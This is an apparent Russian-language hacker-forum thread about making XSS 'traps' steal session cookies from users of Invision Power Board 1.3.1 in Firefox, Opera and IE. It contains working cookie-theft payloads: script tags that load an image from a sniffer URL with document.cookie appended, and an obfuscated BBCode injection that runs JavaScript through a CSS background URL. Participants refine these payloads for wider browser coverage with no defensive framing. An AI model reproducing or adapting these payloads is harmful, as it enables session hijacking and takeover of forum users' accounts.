Заметил что xss ловушки срабатывают только в ИЕ на примере IPB 1.3.1 final. Решил детально изучить в чем загвоздка. 1) Установил IPB локально 2) Установил локально сниффер подопытные браузеры : MSIE 6.0, Opera 9.01, Firefox 2.0 Предистория - я не включаю рисунки в браузере, привычка сложилась с давних пор, когда сидел в lynx или когда было мало трафика и маленькая скорость. Естественно, если рисунки отключены, то комбинации в ловушке типа ../sniffer/image.gif обламываются, и никаких куких с ссылкой на рисунок мы не получим. Короче приступил к тестированию. Из 8 ловушек в ИЕ на ИПБ 1.3.1 сработало 6. В Фаере или Опере ничего не сработало. Создал тестовую хтмл, с текстом Code: <script>alert(document.cookie);</script> <img src="http://localhost/s/s.gif"> <script>img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script> Чтобы получить куки их Оперы или Фаера надо зайти на страничку форума (под логином) и потом только на эту хтмл. Только тогда в логах сниффера будет куки и другая нам нужная инфа. То есть надо еше одно насильное действие Отсюда вытекает вопрос - как сделать чтоб работало во всех браузерах, и почему оно кстати не работает?
----> как сделать чтоб работало во всех браузерах, и почему оно кстати не работает? Учись и больше читай.
такие советы я сам регулярно раздаю, я понимаю что не все скрипты одинаково работают, и соответсвенно разные приколы с приватностью и прочим. Короче кто может детальной обьяснить, буду очень благодарен
---> и почему оно кстати не работает? Потому что для фф жаву разрабатывал Нетскейп, а для ИЕ - Микрософт. ЗЫ, подчисти ящик, а то он ПМ больше не принимает. Grtzzz.
то есть ты хочешь сказать что (выбрать нужное): 1) на данный момент нет готовых кодов для кражи кукисов из оперы/фаера 2) это не возможно 3) возможно, но надо рыть спецификацию
Там есть разница в синтаксисе. Готовые коды есть в Уязвимостях форумов. Егорыч+++ создавал тему с призом в двадцать баксов тем кто покажет реальную разницу в синтаксисе. Приз тогда ушёл. White Jordan, во всех его воплощениях, тоже неплохо описывал. В гугле я тоже много чего читал по этому поводу. В приведённом тобой коде первые две строчки лишние.
из тех что в теме "уязвимости IPB" у меня не один не сработал в Фаере/Опере линк не затруднит? В гугле я нашел кое-что, но не по теме, а о других различиях; а приведенный пример, это лишь отладка, я пытался выяснить что, когда и как работает с его помощью. Но сейчас попробую без первых двух
Код "img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>" спокойно покатит на лисе. насчет оперы хз, не пробовал. Разница далеко не тут в синтаксисе, тем более, что можно писать кросс-браузерный JS код
вот зараза...с первыми двумя строчками не работает, а сама по себе отлично. Проверено в Опере, Фаере. Надо сейчас только раздуплиться как сделать в кодах это, вы тоже подсказывайте, а то у меня ступор может начаться
Зачем такой длинный код? Code: <script>alert(document.cookie);</script> <img src="http://localhost/s/s.gif"> <script>img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script> Достаточно такого: Code: <script>var img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>
мы видимо друг друга не понимаем. Сейчас я использую Code: [HTM*L][EM*AIL][URL=*wj`=`][/U*RL][/EMAIL][/color][co*lor=#F0F5FF]` style=`background:url*(javascript:d*ocument.images[1].src="http://localh*ost/s/s.gif?"+docum*ent.cookie)`[/color]] так вот из таких кодов что мне юзать? Тот что ты привел уже и впихивал в теги и сам по себе оставлял, пока 0 ЗЫ блин, не получается, как сделать внешний инклюд на ява скрипт?
